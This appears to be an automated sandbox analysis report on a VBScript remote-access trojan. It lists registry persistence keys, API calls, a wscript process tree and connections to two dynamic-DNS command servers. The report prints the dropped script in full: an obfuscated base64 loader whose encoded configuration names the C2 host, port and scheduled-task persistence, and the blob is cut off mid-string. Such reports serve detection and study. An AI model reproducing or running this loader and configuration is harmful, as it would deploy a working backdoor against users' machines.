HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\LocaleName
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sCountry
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sList
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sDecimal
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sThousand
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sGrouping
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sNativeDigits
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sCurrency
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sMonDecimalSep
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sMonThousandSep
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sMonGrouping
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sPositiveSign
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sNegativeSign
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sTimeFormat
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sShortTime
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\s1159
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\s2359
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sShortDate
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sYearMonth
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sLongDate
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCountry
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iMeasure
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iPaperSize
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iDigits
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iLZero
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iNegNumber
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\NumShape
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCurrDigits
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCurrency
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iNegCurr
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCalendarType
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Plus! ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PriorityControl\Win32PrioritySeparation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\software\TrlLRLG2Z1SYOAj
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TrlLRLG2Z1SYOAj\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\TrlLRLG2Z1SYOAj
HKEY_LOCAL_MACHINE\software\lXYOCrWYMY
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\lXYOCrWYMY\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lXYOCrWYMY
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ole32.dll.CLSIDFromProgIDEx
ole32.dll.CoGetClassObject
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
wscript.exe.#1
sxs.dll.SxsOleAut32RedirectTypeLibrary
advapi32.dll.RegOpenKeyW
advapi32.dll.RegQueryValueW
shell32.dll.ShellExecuteExW
ole32.dll.OleInitialize
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PSPropertyBag_WriteDWORD
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
propsys.dll.PSPropertyBag_ReadDWORD
propsys.dll.PSPropertyBag_ReadGUID
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
advapi32.dll.RegEnumKeyW
advapi32.dll.OpenThreadToken
ole32.dll.StringFromGUID2
apphelp.dll.ApphelpCheckShellObject
ole32.dll.CoCreateInstance
urlmon.dll.CreateUri
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
comctl32.dll.#328
comctl32.dll.#334
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
oleaut32.dll.#2
setupapi.dll.CM_Get_Device_Interface_List_ExW
shell32.dll.#102
propsys.dll.PSPropertyBag_ReadStrAlloc
comctl32.dll.#332
comctl32.dll.#386
ole32.dll.CoInitializeEx
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#338
ole32.dll.CoUninitialize
sechost.dll.ConvertSidToStringSidW
profapi.dll.#104
propsys.dll.#430
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegGetValueW
advapi32.dll.RegCloseKey
ole32.dll.CoTaskMemRealloc
propsys.dll.InitPropVariantFromStringAsVector
propsys.dll.PSCoerceToCanonicalValue
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
ole32.dll.CoAllowSetForegroundWindow
shell32.dll.SHGetFolderPathW
advapi32.dll.SaferGetPolicyInformation
ntdll.dll.RtlDllShutdownInProgress
comctl32.dll.#329
ole32.dll.OleUninitialize
ole32.dll.CoRevokeInitializeSpy
comctl32.dll.#388
oleaut32.dll.#500
comctl32.dll.#339
shell32.dll.SHGetPathFromIDListW
propsys.dll.PSPropertyBag_WriteStr
oleaut32.dll.#9
propsys.dll.PSPropertyBag_WriteGUID
kernel32.dll.NlsGetCacheUpdateCount
kernel32.dll.GetCalendarInfoW
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
cryptsp.dll.CryptReleaseContext
cryptbase.dll.SystemFunction036
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
kernel32.dll.HeapSetInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
kernel32.dll.GetModuleHandleW
urlmon.dll.DllCanUnloadNow
urlmon.dll.IEDllLoader
urlmon.dll.CoInternetCreateZoneManager
urlmon.dll.CoInternetGetSession
urlmon.dll.CopyBindInfo
urlmon.dll.CreateURLMoniker
urlmon.dll.RegisterBindStatusCallback
urlmon.dll.ReleaseBindInfo
urlmon.dll.RevokeBindStatusCallback
urlmon.dll.UrlMkGetSessionOption
urlmon.dll.CoInternetCreateSecurityManager
urlmon.dll.CoInternetCombineUrl
urlmon.dll.CoInternetGetSecurityUrl
urlmon.dll.IsValidURL
wininet.dll.InternetCrackUrlW
wininet.dll.InternetCreateUrlW
ole32.dll.MkParseDisplayName
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.GetLocaleInfoEx
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
ole32.dll.BindMoniker
oleaut32.dll.#283
oleaut32.dll.#284
advapi32.dll.AddMandatoryAce
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.IsWow64Process
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
kernel32.dll.RegQueryValueExW
kernel32.dll.RegCloseKey
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
urlmon.dll.CoInternetIsFeatureEnabledForUrl
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
kernel32.dll.RegCreateKeyExW
ntdll.dll.EtwRegisterTraceGuidsW
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
wbemsvc.dll.DllGetClassObject
wbemsvc.dll.DllCanUnloadNow
kernel32.dll.RegOpenKeyExW
oleaut32.dll.#289
oleaut32.dll.#287
oleaut32.dll.#288
oleaut32.dll.#290
oleaut32.dll.#285
kernel32.dll.GetDiskFreeSpaceExW
kernel32.dll.GetVolumePathNameW
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.Process32First
kernel32.dll.Process32Next
kernel32.dll.Module32First
kernel32.dll.Module32Next
kernel32.dll.Heap32ListFirst
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetSystemDefaultUILanguage
oleaut32.dll.#286
winbrand.dll.BrandingLoadString
security.dll.InitSecurityInterfaceW
cryptsp.dll.SystemFunction035
schannel.dll.SpUserModeInitialize
advapi32.dll.RegCreateKeyExW
advapi32.dll.RegQueryValueExW
user32.dll.GetSystemMetrics
ntdll.dll.RtlInitUnicodeString
ntdll.dll.RtlFreeUnicodeString
ntdll.dll.NtSetSystemEnvironmentValue
ntdll.dll.NtQuerySystemEnvironmentValue
ntdll.dll.NtCreateFile
ntdll.dll.NtQuerySystemInformation
ntdll.dll.NtQueryDirectoryObject
ntdll.dll.NtQueryObject
ntdll.dll.NtOpenDirectoryObject
ntdll.dll.NtQueryInformationProcess
ntdll.dll.NtQueryInformationToken
ntdll.dll.NtOpenFile
ntdll.dll.NtClose
ntdll.dll.NtFsControlFile
ntdll.dll.NtQueryVolumeInformationFile
advapi32.dll.LookupPrivilegeValueW
netapi32.dll.NetGroupEnum
netapi32.dll.NetGroupGetInfo
netapi32.dll.NetGroupSetInfo
netapi32.dll.NetLocalGroupGetInfo
netapi32.dll.NetLocalGroupSetInfo
netapi32.dll.NetGroupGetUsers
netapi32.dll.NetLocalGroupGetMembers
netapi32.dll.NetLocalGroupEnum
netapi32.dll.NetShareEnum
netapi32.dll.NetShareGetInfo
netapi32.dll.NetShareAdd
netapi32.dll.NetShareEnumSticky
netapi32.dll.NetShareSetInfo
netapi32.dll.NetShareDel
netapi32.dll.NetShareDelSticky
netapi32.dll.NetShareCheck
netapi32.dll.NetUserEnum
netapi32.dll.NetUserGetInfo
netapi32.dll.NetUserSetInfo
netapi32.dll.NetApiBufferFree
netapi32.dll.NetQueryDisplayInformation
netapi32.dll.NetServerSetInfo
netapi32.dll.NetServerGetInfo
netapi32.dll.NetGetDCName
netapi32.dll.NetWkstaGetInfo
netapi32.dll.NetGetAnyDCName
netapi32.dll.NetServerEnum
netapi32.dll.NetUserModalsGet
netapi32.dll.NetScheduleJobAdd
netapi32.dll.NetScheduleJobDel
netapi32.dll.NetScheduleJobEnum
netapi32.dll.NetScheduleJobGetInfo
netapi32.dll.NetUseGetInfo
netapi32.dll.NetEnumerateTrustedDomains
netapi32.dll.DsGetDcNameW
netapi32.dll.DsRoleGetPrimaryDomainInformation
netapi32.dll.DsRoleFreeMemory
netapi32.dll.NetRenameMachineInDomain
netapi32.dll.NetJoinDomain
netapi32.dll.NetUnjoinDomain
wkscli.dll.NetWkstaGetInfo
cscapi.dll.CscNetApiGetInterface
oleaut32.dll.#8
oleaut32.dll.#15
oleaut32.dll.#26
"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
wscript //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
wscript.exe //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Local\!IETld!Mutex
Local\ZonesCounterMutex
IESQMMUTEX_0_208

Process Tree

  • wscript.exe 2008 "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Local\Temp\TrlLRLG2Z1SYOAj.vbs"
    • wscript.exe 3012 "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
    • wscript.exe 2556 "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
      • wscript.exe 1052 "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
  • svchost.exe 568 C:\Windows\system32\svchost.exe -k DcomLaunch
    • WmiPrvSE.exe 2444 C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

wscript.exe, PID: 2008, Parent PID: 2592
Full Path: C:\Windows\SysWOW64\wscript.exe
Command Line: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Local\Temp\TrlLRLG2Z1SYOAj.vbs"
wscript.exe, PID: 3012, Parent PID: 2008
Full Path: C:\Windows\SysWOW64\wscript.exe
Command Line: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
wscript.exe, PID: 2556, Parent PID: 2008
Full Path: C:\Windows\SysWOW64\wscript.exe
Command Line: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs"
wscript.exe, PID: 1052, Parent PID: 2556
Full Path: C:\Windows\SysWOW64\wscript.exe
Command Line: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs"
svchost.exe, PID: 568, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k DcomLaunch
WmiPrvSE.exe, PID: 2444, Parent PID: 568
Full Path: C:\Windows\sysnative\wbem\WmiPrvSE.exe
Command Line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 79.134.225.73 [VT] Switzerland
N 185.206.227.180 [VT] United Kingdom

TCP

Source Source Port Destination Destination Port
192.168.35.22 49180 185.206.227.180 curtisjnr.dynu.net 1901
192.168.35.22 49186 185.206.227.180 curtisjnr.dynu.net 1901
192.168.35.22 49187 79.134.225.73 britianica.uk.com 5000
192.168.35.22 49192 79.134.225.73 britianica.uk.com 5000

UDP

Source Source Port Destination Destination Port
192.168.35.22 58774 8.8.8.8 53
192.168.35.22 61809 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
curtisjnr.dynu.net [VT] A 185.206.227.180 [VT]
britianica.uk.com [VT] A 79.134.225.73 [VT]

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name lXYOCrWYMY.vbs
Associated Filenames
C:\Users\user\AppData\Roaming\lXYOCrWYMY.vbs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lXYOCrWYMY.vbs
File Size 20885 bytes
File Type C++ source, ASCII text, with very long lines
MD5 193d67c9d5cf6d85e11553f04e693b51
SHA1 74ff46d3016f2a57dab70fd491f27dfaebb18369
SHA256 3648ae500ff830e5b3175b03507fa26f094562cdce31073a7c6bdb0ca05331e7
CRC32 809BDA4D
Ssdeep 384:AWYC8VL0G7vqVPItw8mILQDlSB6g/VjfWUCQDi1grPwh/aPYdLyfKoPYUHt8kBsv:A/C8VLwuLQDUB6AfWUCUi0YdLQKmYUd4
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
class cURvES
public function manUNI(ByRef bike_race, ByRef kawasaki)
	call uLOSE(bike_race, chr(34))
	bike_race(1,1).Type = 1
	bike_race(1,1).Open
	bike_race(1,1).Write bike_race(2,1)
	bike_race(1,1).Position = 0
	bike_race(1,1).Type = 2
	bike_race(1,1).CharSet = bike_race(1,2)
	kawasaki = bike_race(1,1).ReadText
	manUNI = 2
end function

public function uLOSE(ByRef gloWORD, ByVal rescur)
	on error resume next
	gloWORD(1,2).DataType = gloWORD(0,2)
	gloWORD(1,2).Text = gloWORD(2,0)
	gloWORD(2,1) = gloWORD(1,2).NodeTypedValue
	gloWORD(1,2) = "us-ascii"
	set gloWORD(1,1) = CreateObject("ADODB.Stream")
	uLOSE = 1
end function

end class


dim sanDISK(2,2)

set sanDISK(0,0) = new cURvES
sanDISK(0,2) = chr(98) & chr(105) & chr(110) & chr(46) & chr(98) & chr(97) & chr(115) & chr(101) & chr(54) & chr(52)
sanDISK(1,0) = "*("
sanDISK(1,1) = ""
set sanDISK(1,2) = CreateObject("Microsoft.XMLDOM").createElement("tmp")
sanDISK(2,0) = Replace("JzxbIHJlY29kZXIgOiBob3VkaW5pIChjKSBza3lwZSA6IGhvdWRpb*(ktZnggXT4KCic9LT0tPS09LT0gY29uZ*(lnID0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09Cgpob3N0ID0gI*(JyaXRpYW5pY2EudWsuY29tIgpwb3J0ID0gNTAwMAppbnN0YWxsZGlyID0gIiVhcHBkYXRhJSIKbG5rZ*(lsZSA9IHRydWUKbG5rZ*(9sZGVyID0gdHJ1ZQoKJz0tPS09LT0tPSBwdWJsaWMgd*(FyID0tPS09LT0tPS09LT0tPS09LT0tPS09LT0KC*(RpbSBzaGVsbG9iaiAKc2V0IHNoZWxsb2JqID0gd3Njc*(lwdC5jc*(VhdGVvY*(plY3QoIndzY3JpcHQuc2hlbGwiKQpkaW0gZ*(lsZXN5c3RlbW9iagpzZXQgZ*(lsZXN5c3RlbW9iaiA9IGNyZWF0ZW9ia*(VjdCgic2NyaXB0aW5nL*(ZpbGVzeXN0ZW1vY*(plY3QiKQpkaW0gaHR0cG9iagpzZXQgaHR0cG9iaiA9IGNyZWF0ZW9ia*(VjdCgibXN4bWwyLnhtbGh0dHAiKQoKJ2ZuID0gc2hlbGxvY*(ouZXhwYW5kZW52aXJvb*(1lbnRzdHJpb*(dzKCIldGVtcCUiKSA*(ICJcbWVlZS52YnMiCidkc*(9wID0gInNldCBzaGVsbG9iaiA9IHdzY3JpcHQuY3JlYXRlb2JqZWN0KCIgJiBjaHIoMzQpICYgIndzY3JpcHQuc2hlbGwiICYgY2hyKDM0KSA*(ICIpIiA*(IHZiY3JsZgonZHJvcCA9IGRyb3AgJiAic2hlbGxvY*(oucnVuICIgJiBjaHIoMzQpICYgIiVjb21zcGVjJSAvYyBzdGFydCBodHRwczovL2ctdGVjaC5jb20iICYgY2hyKDM0KSA*(ICIsIDAsIHRydWUiCidTZXQgb2JqR*(lsZVRvV3JpdGUgPSBDc*(VhdGVPY*(plY3QoIlNjc*(lwdGluZy5GaWxlU3lzdGVtT2JqZWN0IikuT3BlblRleHRGaWxlKGZuLDIsdHJ1ZSkKJ29iakZpbGVUb1dyaXRlLldyaXRlTGluZShkc*(9wKQonb2JqR*(lsZVRvV3JpdGUuQ2xvc2UKJ1NldCBvY*(pGaWxlVG9Xc*(l0ZSA9IE5vdGhpb*(cKJ3NoZWxsb2JqLnJ1biAiJWNvbXNwZWMlIC9jIHNjaHRhc2tzIC9jc*(VhdGUgL3NjIG1pbnV0ZSAvbW8gMzAgL3RuIFNreXBlZSAvdHIgIiA*(IGNocigzNCkgJiB*(biA*(IGNocigzNCksIDAsIHRydWUKCic9LT0tPS09LT0gcHJpd*(F0IHZhciA9LT0tPS09LT0tPS09LT0tPS09LT0tPQoKaW5zdGFsbG5hbWUgPSB3c2NyaXB0LnNjc*(lwdG5hbWUKc3RhcnR1cCA9IHNoZWxsb2JqLnNwZWNpYWx*(b2xkZXJzICgic3RhcnR1cCIpICYgIlwiC*(luc3RhbGxkaXIgPSBzaGVsbG9iai5leHBhb*(RlbnZpc*(9ubWVudHN0c*(luZ3MoaW5zdGFsbGRpcikgJiAiXCIKaWYgb*(90IGZpbGVzeXN0ZW1vY*(ouZ*(9sZGVyZXhpc3RzKGluc3RhbGxkaXIpIHRoZW4gIGluc3RhbGxkaXIgPSBzaGVsbG9iai5leHBhb*(RlbnZpc*(9ubWVudHN0c*(luZ3MoI